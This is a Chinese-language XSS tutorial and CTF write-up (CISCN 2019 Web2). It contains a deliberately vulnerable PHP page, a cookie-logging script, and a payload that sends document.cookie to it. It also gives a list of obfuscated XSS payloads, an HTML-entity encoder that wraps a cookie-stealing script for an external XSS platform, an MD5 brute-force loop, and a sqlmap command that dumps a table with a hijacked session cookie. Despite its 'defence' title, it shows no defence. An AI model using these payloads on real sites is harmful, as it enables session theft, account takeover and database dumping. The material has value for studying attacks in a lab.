XSS跨站脚本攻击剖析与防御

Web

cookie欺骗攻击

index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
setcookie("name","cookie");
if(isset($_POST['name']))
{
echo $_POST['name'];
}
?>
<html>
<body>
<form action="" method="post">
Name: <input type="text" name="name"><br>
<input type="submit">
</form>
</body>
</html>

getcookie.php

1
2
3
4
5
6
<?php
$cookie1=$_GET['cookie'];
$log=fopen("demo.txt","a");
fwrite($log,$cookie1."\n");
fclose($log)
?>

payload,输入框输入

1
<script>var img = document.createElement('img');img.src = 'http://localhost/getcookie.php?cookie='+encodeURIComponent(document.cookie);</script>

成功在demo.txt中获得cookie

一些payload

1
2
3
4
5
6
7
8
9
10
11
<img src = "#" onerror=alert(/xss/)>

<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
原code:
<img src="1" onerror=eval("alert('xss')")></img>
<a href="" onclick="alert(1)">aaaaa</a>
<a href="" onclick=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")>aaaaa</a> 
<iframe src=javascript:alert('xss');height=0 width=0 /><iframe> 
<iframe src="data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>
<iframe src=1 onmouseover=alert('xss') y=2016 /><iframe>

CISCN 2019 华东北赛区 Web2

方法: 投稿-》反馈-》获得管理员cookie-》注入

HTML Markup转码

1
2
3
4
5
6
7
8
in_str = "(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();"

output = ""

for c in in_str:
    output += "&#" + str(ord(c))

print("<svg><script>eval&#40&#34" + output + "&#34&#41</script>")

丢平台上后
然后爆破md5

1
2
3
4
5
6
7
import hashlib

for i in range(1, 10000001):
    s = hashlib.md5(str(i).encode('utf-8')).hexdigest()[0:6]
    if s == "4426f0":
        print(i)
        break

置管理员 cookie,猜测后台路径,发现 /admin.php 能访问。
注入获取flag

1
2
python sqlmap.py -u http://502ce080-5cd5-4c3d-8467-1fc354132f71.node3.buuoj.cn/admin.php?id=2 --cookie="PHPSESSID=57bd5e76b87b83da7e7332ad6f60cdd7" -T flag --dump --flush-session
--fresh-queries --fresh-queries --delay 0.1